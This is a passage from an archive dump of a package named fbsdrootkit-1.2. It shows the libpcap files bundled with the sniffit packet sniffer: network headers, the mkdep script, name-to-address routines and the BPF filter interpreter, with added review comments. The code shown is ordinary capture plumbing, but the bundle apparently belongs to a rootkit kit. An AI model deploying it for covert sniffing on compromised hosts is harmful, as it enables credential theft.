*/ #ifndef _netinet_udp_h #define _netinet_udp_h struct udphdr { u_short uh_sport; /* source port */ u_short uh_dport; /* destination port */ short uh_ulen; /* udp length */ u_short uh_sum; /* udp checksum */ }; #endif /*!_netinet_udp_h*/ fbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/net/ 40700 764 764 0 6226213210 20110 5ustar dfdffbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/net/slip.h100600 764 764 261 6226213210 21306 0ustar dfdf/* linux does not give us the link level header */ #define SLIP_HDRLEN 16 #define SLX_DIR 0 #define SLX_CHDR 1 #define CHDR_LEN 15 #define SLIPDIR_IN 0 #define SLIPDIR_OUT 1 fbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/net/slcompress.h100600 764 764 7364 6226213210 22564 0ustar dfdf/* * Definitions for tcp compression routines. * * @(#) $Header: slcompress.h,v 1.15 93/09/04 22:15:29 leres Exp $ (LBL) * * Copyright (c) 1989, 1990, 1992, 1993 Regents of the University of * California. All rights reserved. * * Redistribution and use in source and binary forms are permitted * provided that the above copyright notice and this paragraph are * duplicated in all such forms and that any documentation, * advertising materials, and other materials related to such * distribution and use acknowledge that the software was developed * by the University of California, Berkeley. The name of the * University may not be used to endorse or promote products derived * from this software without specific prior written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED * WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE. * * Van Jacobson (van@ee.lbl.gov), Dec 31, 1989: * - Initial distribution. 
*/ #define MAX_STATES 16 /* must be > 2 and < 256 */ #define MAX_HDR MLEN /* XXX 4bsd-ism: should really be 128 */ /* * Compressed packet format: * * The first octet contains the packet type (top 3 bits), TCP * 'push' bit, and flags that indicate which of the 4 TCP sequence * numbers have changed (bottom 5 bits). The next octet is a * conversation number that associates a saved IP/TCP header with * the compressed packet. The next two octets are the TCP checksum * from the original datagram. The next 0 to 15 octets are * sequence number changes, one change per bit set in the header * (there may be no changes and there are two special cases where * the receiver implicitly knows what changed -- see below). * * There are 5 numbers which can change (they are always inserted * in the following order): TCP urgent pointer, window, * acknowlegement, sequence number and IP ID. (The urgent pointer * is different from the others in that its value is sent, not the * change in value.) Since typical use of SLIP links is biased * toward small packets (see comments on MTU/MSS below), changes * use a variable length coding with one octet for numbers in the * range 1 - 255 and 3 octets (0, MSB, LSB) for numbers in the * range 256 - 65535 or 0. (If the change in sequence number or * ack is more than 65535, an uncompressed packet is sent.) */ /* * Packet types (must not conflict with IP protocol version) * * The top nibble of the first octet is the packet type. There are * three possible types: IP (not proto TCP or tcp with one of the * control flags set); uncompressed TCP (a normal IP/TCP packet but * with the 8-bit protocol field replaced by an 8-bit connection id -- * this type of packet syncs the sender & receiver); and compressed * TCP (described above). * * LSB of 4-bit field is TCP "PUSH" bit (a worthless anachronism) and * is logically part of the 4-bit "changes" field that follows. Top * three bits are actual packet type. 
For backward compatibility * and in the interest of conserving bits, numbers are chosen so the * IP protocol version number (4) which normally appears in this nibble * means "IP packet". */ /* packet types */ #define TYPE_IP 0x40 #define TYPE_UNCOMPRESSED_TCP 0x70 #define TYPE_COMPRESSED_TCP 0x80 #define TYPE_ERROR 0x00 /* Bits in first octet of compressed packet */ #define NEW_C 0x40 /* flag bits for what changed in a packet */ #define NEW_I 0x20 #define NEW_S 0x08 #define NEW_A 0x04 #define NEW_W 0x02 #define NEW_U 0x01 /* reserved, special-case values of above */ #define SPECIAL_I (NEW_S|NEW_W|NEW_U) /* echoed interactive traffic */ #define SPECIAL_D (NEW_S|NEW_A|NEW_W|NEW_U) /* unidirectional data */ #define SPECIALS_MASK (NEW_S|NEW_A|NEW_W|NEW_U) #define TCP_PUSH_BIT 0x10 fbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/sys/ 40700 764 764 0 6226213210 20140 5ustar dfdffbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/sys/mbuf.h100600 764 764 0 6226213210 21247 0ustar dfdffbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/linux/ 40700 764 764 0 6226213210 20461 5ustar dfdffbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/linux/if_arp.h100600 764 764 3217 6226213210 22174 0ustar dfdf/* @(#)if_arp.h 1.5 88/08/19 SMI; from UCB 7.1 1/24/86 */ /* * Copyright (c) 1986 Regents of the University of California. * All rights reserved. The Berkeley software License Agreement * specifies the terms and conditions for redistribution. */ #ifndef _net_if_arp_h #define _net_if_arp_h /* * Address Resolution Protocol. * * See RFC 826 for protocol description. ARP packets are variable * in size; the arphdr structure defines the fixed-length portion. * Protocol type values are the same as those for 10 Mb/s Ethernet. * It is followed by the variable-sized fields ar_sha, arp_spa, * arp_tha and arp_tpa in that order, according to the lengths * specified. Field names used correspond to RFC 826. 
*/ struct arphdr { u_short ar_hrd; /* format of hardware address */ #define ARPHRD_ETHER 1 /* ethernet hardware address */ u_short ar_pro; /* format of protocol address */ u_char ar_hln; /* length of hardware address */ u_char ar_pln; /* length of protocol address */ u_short ar_op; /* one of: */ #define ARPOP_REQUEST 1 /* request to resolve address */ #define ARPOP_REPLY 2 /* response to previous request */ #define REVARP_REQUEST 3 /* Reverse ARP request */ #define REVARP_REPLY 4 /* Reverse ARP reply */ /* * The remaining fields are variable in size, * according to the sizes above, and are defined * as appropriate for specific hardware/protocol * combinations. (E.g., see .) */ #ifdef notdef u_char ar_sha[]; /* sender hardware address */ u_char ar_spa[]; /* sender protocol address */ u_char ar_tha[]; /* target hardware address */ u_char ar_tpa[]; /* target protocol address */ #endif notdef }; #endif fbsdrootkit-1.2/sniffit.0.3.3/libpcap/mkdep100500 764 764 4333 6226213210 15666 0ustar dfdf#!/bin/sh - # # Copyright (c) 1987 Regents of the University of California. # All rights reserved. # # Redistribution and use in source and binary forms are permitted # provided that this notice is preserved and that due credit is given # to the University of California at Berkeley. The name of the University # may not be used to endorse or promote products derived from this # software without specific prior written permission. This software # is provided ``as is'' without express or implied warranty. 
# # @(#)mkdep.sh 5.11 (Berkeley) 5/5/88 # PATH=/bin:/usr/bin:/usr/ucb:/usr/local:/usr/local/bin export PATH MAKE=Makefile # default makefile name is "Makefile" CC=cc # default C compiler is "cc" while : do case "$1" in # -c allows you to specify the C compiler -c) CC=$2 shift; shift ;; # -f allows you to select a makefile name -f) MAKE=$2 shift; shift ;; # the -p flag produces "program: program.c" style dependencies # so .o's don't get produced -p) SED='s;\.o;;' shift ;; *) break ;; esac done if [ $# = 0 ] ; then echo 'usage: mkdep [-p] [-c cc] [-f makefile] [flags] file ...' exit 1 fi if [ ! -w $MAKE ]; then echo "mkdep: no writeable file \"$MAKE\"" exit 1 fi TMP=/tmp/mkdep$$ trap 'rm -f $TMP ; exit 1' 1 2 3 13 15 cp $MAKE ${MAKE}.bak sed -e '/DO NOT DELETE THIS LINE/,$d' < $MAKE > $TMP cat << _EOF_ >> $TMP # DO NOT DELETE THIS LINE -- mkdep uses it. # DO NOT PUT ANYTHING AFTER THIS LINE, IT WILL GO AWAY. _EOF_ # If your compiler doesn't have -M, add it. If you can't, the next two # lines will try and replace the "cc -M". The real problem is that this # hack can't deal with anything that requires a search path, and doesn't # even try for anything using bracket (<>) syntax. # # egrep '^#include[ ]*".*"' /dev/null $* | # sed -e 's/:[^"]*"\([^"]*\)".*/: \1/' -e 's/\.c/.o/' | $CC -M $* | sed " s; \./; ;g $SED" | awk '{ if ($1 != prev) { if (rec != "") print rec; rec = $0; prev = $1; } else { if (length(rec $2) > 78) { print rec; rec = $0; } else rec = rec " " $2 } } END { print rec }' >> $TMP cat << _EOF_ >> $TMP # IF YOU PUT ANYTHING HERE IT WILL GO AWAY _EOF_ # copy to preserve permissions cp $TMP $MAKE rm -f ${MAKE}.bak $TMP exit 0 fbsdrootkit-1.2/sniffit.0.3.3/libpcap/nametoaddr.c100400 764 764 16225 6226213210 17147 0ustar dfdf/* * Copyright (c) 1990, 1991, 1992, 1993, 1994 * The Regents of the University of California. All rights reserved. 
* * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that: (1) source code distributions * retain the above copyright notice and this paragraph in its entirety, (2) * distributions including binary code include the above copyright notice and * this paragraph in its entirety in the documentation or other materials * provided with the distribution, and (3) all advertising materials mentioning * features or use of this software display the following acknowledgement: * ``This product includes software developed by the University of California, * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of * the University nor the names of its contributors may be used to endorse * or promote products derived from this software without specific prior * written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. * * Name to id translation routines used by the scanner. * These functions are not time critical. */ #ifndef lint static char rcsid[] = "@(#) $Header: nametoaddr.c,v 1.21 94/06/20 19:07:54 leres Exp $ (LBL)"; #endif #include #include #include #include #include #include #include #include #include #include #include #include #include "gencode.h" #ifndef __GNUC__ #define inline #endif #ifndef NTOHL #define NTOHL(x) (x) = ntohl(x) #define NTOHS(x) (x) = ntohs(x) #endif static inline int xdtoi(int); /* * Convert host name to internet address. * Return 0 upon failure. 
*/
/*
 * The returned list is not allocated here: it is either the static
 * hlist[] below or the h_addr_list array inside the hostent returned
 * by gethostbyname(), so callers must not free it.  The addresses are
 * byte-swapped in place with NTOHL().
 *
 * NOTE(review): each address is accessed through a u_long pointer; this
 * presumably assumes u_long has the same width as the stored address --
 * confirm on platforms where u_long is wider.
 */
u_long **
pcap_nametoaddr(const char *name)
{
#ifndef h_addr
	static u_long *hlist[2];
#endif
	u_long **p;
	struct hostent *hp;

	if ((hp = gethostbyname(name)) != NULL) {
#ifndef h_addr
		/*
		 * Old-style hostent with a single address member.
		 * NOTE(review): NTOHL() is applied to the pointer member
		 * hp->h_addr itself, not to the address it points to --
		 * confirm intent.
		 */
		hlist[0] = (u_long *)hp->h_addr;
		NTOHL(hp->h_addr);
		return hlist;
#else
		/* Convert every address in the list to host byte order. */
		for (p = (u_long **)hp->h_addr_list; *p; ++p)
			NTOHL(**p);
		return (u_long **)hp->h_addr_list;
#endif
	}
	else
		return 0;
}

/*
 * Convert net name to internet address.
 * Return 0 upon failure.
 *
 * The value returned on success is the n_net field of the netent
 * found by getnetbyname().
 */
u_long
pcap_nametonetaddr(const char *name)
{
	struct netent *np;

	if ((np = getnetbyname(name)) != NULL)
		return np->n_net;
	else
		return 0;
}

/*
 * Convert a port name to its port and protocol numbers.
 * We assume only TCP or UDP.
 * Return 0 upon failure.
 *
 * On success 1 is returned, *port holds the port after NTOHS() and
 * *proto holds the value from pcap_nametoproto(), or PROTO_UNDEF when
 * the name is also registered under the other of "tcp"/"udp".
 */
int
pcap_nametoport(const char *name, int *port, int *proto)
{
	struct servent *sp;
	char *other;

	/* First lookup: any protocol. */
	sp = getservbyname(name, (char *)0);
	if (sp != NULL) {
		NTOHS(sp->s_port);
		*port = sp->s_port;
		*proto = pcap_nametoproto(sp->s_proto);
		/*
		 * We need to check /etc/services for ambiguous entries.
		 * If we find the ambiguous entry, and it has the
		 * same port number, change the proto to PROTO_UNDEF
		 * so both TCP and UDP will be checked.
		 */
		if (*proto == IPPROTO_TCP)
			other = "udp";
		else
			other = "tcp";

		sp = getservbyname(name, other);
		if (sp != 0) {
			NTOHS(sp->s_port);
			/*
			 * With notdef undefined this if governs only the
			 * empty statement, so *proto is set to PROTO_UNDEF
			 * below whether or not the two port numbers agree.
			 */
			if (*port != sp->s_port)
				/* Can't handle ambiguous names that refer
				   to different port numbers. */
#ifdef notdef
				warning("ambiguous port %s in /etc/services",
					name);
#else
			;
#endif
			*proto = PROTO_UNDEF;
		}
		return 1;
	}
#if defined(ultrix) || defined(__osf__)
	/* Special hack in case NFS isn't in /etc/services */
	if (strcmp(name, "nfs") == 0) {
		*port = 2049;
		*proto = PROTO_UNDEF;
		return 1;
	}
#endif
	return 0;
}

/*
 * Convert a protocol name to its protocol number using
 * getprotobyname().  Returns PROTO_UNDEF when the name is not found.
 */
int
pcap_nametoproto(const char *str)
{
	struct protoent *p;

	p = getprotobyname(str);
	if (p != 0)
		return p->p_proto;
	else
		return PROTO_UNDEF;
}

#include "ethertype.h"

/* One entry of the ether protocol table: name and type code. */
struct eproto {
	char *s;	/* protocol name; a null pointer ends the table */
	u_short p;	/* ETHERTYPE_* value for that name */
};

/* Static data base of ether protocol types.
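*/
struct eproto eproto_db[] = {
	{ "pup", ETHERTYPE_PUP },
	{ "xns", ETHERTYPE_NS },
	{ "ip", ETHERTYPE_IP },
	{ "arp", ETHERTYPE_ARP },
	{ "rarp", ETHERTYPE_REVARP },
	{ "sprite", ETHERTYPE_SPRITE },
	{ "mopdl", ETHERTYPE_MOPDL },
	{ "moprc", ETHERTYPE_MOPRC },
	{ "decnet", ETHERTYPE_DN },
	{ "lat", ETHERTYPE_LAT },
	{ "lanbridge", ETHERTYPE_LANBRIDGE },
	{ "vexp", ETHERTYPE_VEXP },
	{ "vprod", ETHERTYPE_VPROD },
	{ "atalk", ETHERTYPE_ATALK },
	{ "atalkarp", ETHERTYPE_AARP },
	{ "loopback", ETHERTYPE_LOOPBACK },
	{ "decdts", ETHERTYPE_DECDTS },
	{ "decdns", ETHERTYPE_DECDNS },
	{ (char *)0, 0 }
};

/*
 * Look up an ether protocol name in eproto_db[].
 * Returns the matching type code, or PROTO_UNDEF when the name is
 * not in the table.  The comparison is an exact strcmp().
 */
int
pcap_nametoeproto(const char *s)
{
	struct eproto *p = eproto_db;

	while (p->s != 0) {
		if (strcmp(p->s, s) == 0)
			return p->p;
		p += 1;
	}
	return PROTO_UNDEF;
}

/*
 * Hex digit to integer.
 *
 * The argument is expected to be a hex digit; any other character
 * falls through to the upper-case branch and yields a meaningless
 * value, so callers should test with isxdigit() first.  The casts keep
 * the <ctype.h> calls defined when the caller passes a plain char with
 * the high bit set.
 */
static inline int
xdtoi(int c)
{
	if (isdigit((unsigned char)c))
		return c - '0';
	else if (islower((unsigned char)c))
		return c - 'a' + 10;
	else
		return c - 'A' + 10;
}

/*
 * Convert a dotted-decimal string to an address value.
 *
 * Each '.'-separated component is accumulated as a decimal number and
 * its low 8 bits are shifted into the result, so "a.b" yields a 16-bit
 * value and "a.b.c.d" a 32-bit one.  No validation is done here: the
 * characters between dots are assumed to be decimal digits.
 */
u_long
__pcap_atoin(const char *s)
{
	u_long addr = 0;
	u_int n;

	while (1) {
		n = 0;
		while (*s && *s != '.')
			n = n * 10 + *s++ - '0';
		addr <<= 8;
		addr |= n & 0xff;
		if (*s == '\0')
			return addr;
		++s;
	}
	/* NOTREACHED */
}

/*
 * Convert an "area.node" string to an address value: the area is
 * placed above AREASHIFT and the node in the low bits, each masked to
 * its field.  bpf_error() is called when the string does not contain
 * two numbers.
 */
u_long
__pcap_atodn(const char *s)
{
#define AREASHIFT 10
#define AREAMASK 0176000
#define NODEMASK 01777

	u_long addr = 0;
	u_int node, area;

	/* area and node are unsigned, so the conversion must be %u. */
	if (sscanf((char *)s, "%u.%u", &area, &node) != 2)
		bpf_error("malformed decnet address '%s'", s);

	addr = (area << AREASHIFT) & AREAMASK;
	addr |= (node & NODEMASK);

	return(addr);
}

/*
 * Convert 's' which has the form "xx:xx:xx:xx:xx:xx" into a new
 * ethernet address. Assumes 's' is well formed.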
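*/
/*
 * The result is a 6-byte buffer obtained from malloc(); the caller
 * owns it.  NULL is returned when the allocation fails.  Parsing stops
 * after six octets or at the end of the string, whichever comes first,
 * so an over-long or truncated string can neither write past the
 * buffer nor read past the terminator; octets that are not present in
 * the string are left as zero.
 */
u_char *
pcap_ether_aton(const char *s)
{
	register u_char *ep, *e;
	register u_int d;

	e = ep = (u_char *)malloc(6);
	if (e == NULL)
		return (NULL);
	memset(e, 0, 6);

	while (*s != '\0' && ep < e + 6) {
		if (*s == ':')
			s += 1;
		/* A trailing ':' must not step over the terminator. */
		if (*s == '\0')
			break;
		d = xdtoi((unsigned char)*s++);
		if (isxdigit((unsigned char)*s)) {
			d <<= 4;
			d |= xdtoi((unsigned char)*s++);
		}
		*ep++ = d;
	}

	return (e);
}

#ifndef ETHER_SERVICE
/* Roll our own */
/*
 * Look up 'name' in PCAP_ETHERS_FILE and return a malloc()ed copy of
 * its 6-byte address, or NULL when the file cannot be opened, the name
 * is not found or the allocation fails.  The file is opened on the
 * first call and rewound on later ones.
 */
u_char *
pcap_ether_hostton(const char *name)
{
	register struct pcap_etherent *ep;
	register u_char *ap;
	static FILE *fp = NULL;
	static int init = 0;

	if (!init) {
		fp = fopen(PCAP_ETHERS_FILE, "r");
		++init;
	} else if (fp != NULL)
		rewind(fp);
	if (fp == NULL)
		return (NULL);

	while ((ep = pcap_next_etherent(fp)) != NULL) {
		if (strcmp(ep->name, name) == 0) {
			ap = (u_char *)malloc(6);
			if (ap != NULL) {
				memcpy(ap, ep->addr, 6);
				return (ap);
			}
			break;
		}
	}
	return (NULL);
}
#else
/* Use the os supplied routines */
/*
 * Resolve 'name' with ether_hostton() and return a malloc()ed copy of
 * the 6-byte address, or NULL when the lookup or the allocation fails.
 */
u_char *
pcap_ether_hostton(const char *name)
{
	register u_char *ap;
	u_char a[6];
#ifndef sgi
	extern int ether_hostton(char *, struct ether_addr *);
#endif

	ap = NULL;
	if (ether_hostton((char*)name, (struct ether_addr *)a) == 0) {
		ap = (u_char *)malloc(6);
		if (ap != NULL)
			memcpy(ap, a, 6);
	}
	return (ap);
}
#endif

/*
 * Translate a decnet host name to its 16-bit address.  Without
 * DECNETLIB the function only reports an error.
 *
 * NOTE(review): bpf_error() presumably does not return; the return
 * statements after it keep the function well defined if it ever does.
 */
u_short
__pcap_nametodnaddr(const char *name)
{
#ifdef	DECNETLIB
	struct nodeent *getnodebyname();
	struct nodeent *nep;
	unsigned short res;

	nep = getnodebyname(name);
	if (nep == ((struct nodeent *)0)) {
		bpf_error("unknown decnet host name '%s'\n", name);
		return(0);
	}

	memcpy((char *)&res, (char *)nep->n_addr, sizeof(unsigned short));
	return(res);
#else
	bpf_error("decnet name support not included, '%s' cannot be translated\n",
		name);
	return(0);
#endif
}
fbsdrootkit-1.2/sniffit.0.3.3/libpcap/net/ 40700 764 764 0 6226213210 15330 5ustar dfdffbsdrootkit-1.2/sniffit.0.3.3/libpcap/net/bpf_filter.c100400 764 764 25354 6226213210 17736 0ustar dfdf/*-
 * Copyright (c) 1990, 1991, 1992, 1993
 * The Regents of the University of California. All rights reserved.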
* * This code is derived from the Stanford/CMU enet packet filter, * (net/enet.c) distributed as part of 4.3BSD, and code contributed * to Berkeley by Steven McCanne and Van Jacobson both of Lawrence * Berkeley Laboratory. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
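*
 * @(#)bpf.c 7.5 (Berkeley) 7/15/91
 *
 * static char rcsid[] =
 * "$Header: bpf_filter.c,v 1.22 94/06/05 20:12:39 leres Exp $";
 */
#if !(defined(lint) || defined(KERNEL))
static char rcsid[] =
    "@(#) $Header: bpf_filter.c,v 1.22 94/06/05 20:12:39 leres Exp $ (LBL)";
#endif

/*
 * NOTE(review): the header names of the #include directives in this
 * copy of the file are missing; they are reproduced as found.
 */
#include
#include
#include
#include

#if defined(__alpha)
typedef int int32;
typedef u_int u_int32;
#else
typedef long int32;
typedef u_long u_int32;
#endif

#ifdef sun
#include
#endif

#if defined(sparc) || defined(mips) || defined(ibm032) || defined(__alpha)
#define BPF_ALIGN
#endif

/*
 * Fetch a big-endian 16/32-bit quantity from the packet.  Machines
 * listed under BPF_ALIGN assemble the value byte by byte instead of
 * dereferencing a possibly unaligned pointer.
 */
#ifndef BPF_ALIGN
#define EXTRACT_SHORT(p)	((u_short)ntohs(*(u_short *)(p)))
#define EXTRACT_LONG(p)		(ntohl(*(u_int32 *)(p)))
#else
#define EXTRACT_SHORT(p)\
	((u_short)\
		((u_short)*((u_char *)(p)+0)<<8|\
		 (u_short)*((u_char *)(p)+1)<<0))
#define EXTRACT_LONG(p)\
		((u_int32)*((u_char *)(p)+0)<<24|\
		 (u_int32)*((u_char *)(p)+1)<<16|\
		 (u_int32)*((u_char *)(p)+2)<<8|\
		 (u_int32)*((u_char *)(p)+3)<<0)
#endif

#ifdef KERNEL
#include
/*
 * Advance m along the mbuf chain until offset k falls inside it,
 * reducing k to the offset within that mbuf.  Makes the enclosing
 * function return 0 when the chain is too short.  k must not be
 * negative.
 */
#define MINDEX(m, k) \
{ \
	register int len = m->m_len; \
 \
	while (k >= len) { \
		k -= len; \
		m = m->m_next; \
		if (m == 0) \
			return 0; \
		len = m->m_len; \
	} \
}

/*
 * Fetch the 32-bit big-endian word at offset k of mbuf chain m.
 * *err is set to 0 on success and to 1 (with a return value of 0) when
 * the offset is negative or the chain does not hold four bytes there.
 * A word may straddle two adjacent mbufs.
 */
static int
m_xword(m, k, err)
	register struct mbuf *m;
	register int k, *err;
{
	register int len;
	register u_char *cp, *np;
	register struct mbuf *m0;

	if (k < 0)
		goto bad;
	len = m->m_len;
	while (k >= len) {
		k -= len;
		m = m->m_next;
		if (m == 0)
			goto bad;
		len = m->m_len;
	}
	cp = mtod(m, u_char *) + k;
	if (len - k >= 4) {
		*err = 0;
		return EXTRACT_LONG(cp);
	}
	m0 = m->m_next;
	if (m0 == 0 || m0->m_len + len - k < 4)
		goto bad;
	*err = 0;
	np = mtod(m0, u_char *);
	/*
	 * cp already points at offset k, so the bytes left in this mbuf
	 * are cp[0], cp[1], ...; indexing with k again would read beyond
	 * the intended bytes.
	 */
	switch (len - k) {

	case 1:
		return ((u_int32)cp[0] << 24) | (np[0] << 16) |
		    (np[1] << 8) | np[2];

	case 2:
		return ((u_int32)cp[0] << 24) | (cp[1] << 16) |
		    (np[0] << 8) | np[1];

	default:
		return ((u_int32)cp[0] << 24) | (cp[1] << 16) |
		    (cp[2] << 8) | np[0];
	}
    bad:
	*err = 1;
	return 0;
}

/*
 * Fetch the 16-bit big-endian halfword at offset k of mbuf chain m.
 * *err is set as for m_xword().
 */
static int
m_xhalf(m, k, err)
	register struct mbuf *m;
	register int k, *err;
{
	register int len;
	register u_char *cp;
	register struct mbuf *m0;

	if (k < 0)
		goto bad;
	len = m->m_len;
	while (k >= len) {
		k -= len;
		m = m->m_next;
		if (m == 0)
			goto bad;
		len = m->m_len;
	}
	cp = mtod(m, u_char *) + k;
	if (len - k >= 2) {
		*err = 0;
		return EXTRACT_SHORT(cp);
	}
	m0 = m->m_next;
	if (m0 == 0)
		goto bad;
	*err = 0;
	/* cp already includes the offset k (see m_xword). */
	return (cp[0] << 8) | mtod(m0, u_char *)[0];
 bad:
	*err = 1;
	return 0;
}
#endif

/*
 * Execute the filter program starting at pc on the packet p
 * wirelen is the length of the original packet
 * buflen is the amount of data present
 *
 * Returns the value of the RET instruction that ends the program, 0
 * when the program is rejected at run time, or (u_int)-1 when pc is
 * null.  In the kernel a buflen of 0 means p is really an mbuf chain.
 *
 * The interpreter does not know the program length, so it cannot
 * check jump targets; it relies on the program having been validated
 * (bpf_validate() in the kernel) or generated by a trusted compiler.
 * What it can check locally it does: packet offsets must be
 * non-negative and inside the buffer, scratch memory indices must be
 * below BPF_MEMWORDS, and division by a zero constant is refused.
 * A, X and the scratch memory start out as zero so that a program
 * reading them before writing them never sees stale stack contents.
 */
u_int
bpf_filter(pc, p, wirelen, buflen)
	register struct bpf_insn *pc;
	register u_char *p;
	u_int wirelen;
	register u_int buflen;
{
	register u_int32 A, X;
	register int k;
	int32 mem[BPF_MEMWORDS];

	if (pc == 0)
		/*
		 * No filter means accept all.
		 */
		return (u_int)-1;

	A = 0;
	X = 0;
	for (k = 0; k < BPF_MEMWORDS; ++k)
		mem[k] = 0;

	--pc;
	while (1) {
		++pc;
		switch (pc->code) {

		default:
#ifdef KERNEL
			return 0;
#else
			abort();
#endif
		case BPF_RET|BPF_K:
			return (u_int)pc->k;

		case BPF_RET|BPF_A:
			return (u_int)A;

		case BPF_LD|BPF_W|BPF_ABS:
			k = pc->k;
			/*
			 * A negative offset would wrap in the unsigned
			 * comparison below and pass the bounds check.
			 */
			if (k < 0)
				return 0;
			if (k + sizeof(int32) > buflen) {
#ifdef KERNEL
				int merr;

				if (buflen != 0)
					return 0;
				A = m_xword((struct mbuf *)p, k, &merr);
				if (merr != 0)
					return 0;
				continue;
#else
				return 0;
#endif
			}
			A = EXTRACT_LONG(&p[k]);
			continue;

		case BPF_LD|BPF_H|BPF_ABS:
			k = pc->k;
			if (k < 0)
				return 0;
			if (k + sizeof(short) > buflen) {
#ifdef KERNEL
				int merr;

				if (buflen != 0)
					return 0;
				A = m_xhalf((struct mbuf *)p, k, &merr);
				/* Reject on a short chain, as the other loads do. */
				if (merr != 0)
					return 0;
				continue;
#else
				return 0;
#endif
			}
			A = EXTRACT_SHORT(&p[k]);
			continue;

		case BPF_LD|BPF_B|BPF_ABS:
			k = pc->k;
			if (k < 0)
				return 0;
			if (k >= buflen) {
#ifdef KERNEL
				register struct mbuf *m;

				if (buflen != 0)
					return 0;
				m = (struct mbuf *)p;
				MINDEX(m, k);
				A = mtod(m, u_char *)[k];
				continue;
#else
				return 0;
#endif
			}
			A = p[k];
			continue;

		case BPF_LD|BPF_W|BPF_LEN:
			A = wirelen;
			continue;

		case BPF_LDX|BPF_W|BPF_LEN:
			X = wirelen;
			continue;

		case BPF_LD|BPF_W|BPF_IND:
			/* X comes from packet data, so k can be anything. */
			k = X + pc->k;
			if (k < 0)
				return 0;
			if (k + sizeof(int32) > buflen) {
#ifdef KERNEL
				int merr;

				if (buflen != 0)
					return 0;
				A = m_xword((struct mbuf *)p, k, &merr);
				if (merr != 0)
					return 0;
				continue;
#else
				return 0;
#endif
			}
			A = EXTRACT_LONG(&p[k]);
			continue;

		case BPF_LD|BPF_H|BPF_IND:
			k = X + pc->k;
			if (k < 0)
				return 0;
			if (k + sizeof(short) > buflen) {
#ifdef KERNEL
				int merr;

				if (buflen != 0)
					return 0;
				A = m_xhalf((struct mbuf *)p, k, &merr);
				if (merr != 0)
					return 0;
				continue;
#else
				return 0;
#endif
			}
			A = EXTRACT_SHORT(&p[k]);
			continue;

		case BPF_LD|BPF_B|BPF_IND:
			k = X + pc->k;
			if (k < 0)
				return 0;
			if (k >= buflen) {
#ifdef KERNEL
				register struct mbuf *m;

				if (buflen != 0)
					return 0;
				m = (struct mbuf *)p;
				MINDEX(m, k);
				/* u_char: a plain char would sign-extend into A. */
				A = mtod(m, u_char *)[k];
				continue;
#else
				return 0;
#endif
			}
			A = p[k];
			continue;

		case BPF_LDX|BPF_MSH|BPF_B:
			k = pc->k;
			if (k < 0)
				return 0;
			if (k >= buflen) {
#ifdef KERNEL
				register struct mbuf *m;

				if (buflen != 0)
					return 0;
				m = (struct mbuf *)p;
				MINDEX(m, k);
				X = (mtod(m, char *)[k] & 0xf) << 2;
				continue;
#else
				return 0;
#endif
			}
			X = (p[k] & 0xf) << 2;
			continue;

		case BPF_LD|BPF_IMM:
			A = pc->k;
			continue;

		case BPF_LDX|BPF_IMM:
			X = pc->k;
			continue;

		/*
		 * Scratch memory accesses: the index comes straight from
		 * the program, so it is range-checked before use.
		 */
		case BPF_LD|BPF_MEM:
			if (pc->k < 0 || pc->k >= BPF_MEMWORDS)
				return 0;
			A = mem[pc->k];
			continue;

		case BPF_LDX|BPF_MEM:
			if (pc->k < 0 || pc->k >= BPF_MEMWORDS)
				return 0;
			X = mem[pc->k];
			continue;

		case BPF_ST:
			if (pc->k < 0 || pc->k >= BPF_MEMWORDS)
				return 0;
			mem[pc->k] = A;
			continue;

		case BPF_STX:
			if (pc->k < 0 || pc->k >= BPF_MEMWORDS)
				return 0;
			mem[pc->k] = X;
			continue;

		case BPF_JMP|BPF_JA:
			pc += pc->k;
			continue;

		case BPF_JMP|BPF_JGT|BPF_K:
			pc += (A > pc->k) ? pc->jt : pc->jf;
			continue;

		case BPF_JMP|BPF_JGE|BPF_K:
			pc += (A >= pc->k) ? pc->jt : pc->jf;
			continue;

		case BPF_JMP|BPF_JEQ|BPF_K:
			pc += (A == pc->k) ? pc->jt : pc->jf;
			continue;

		case BPF_JMP|BPF_JSET|BPF_K:
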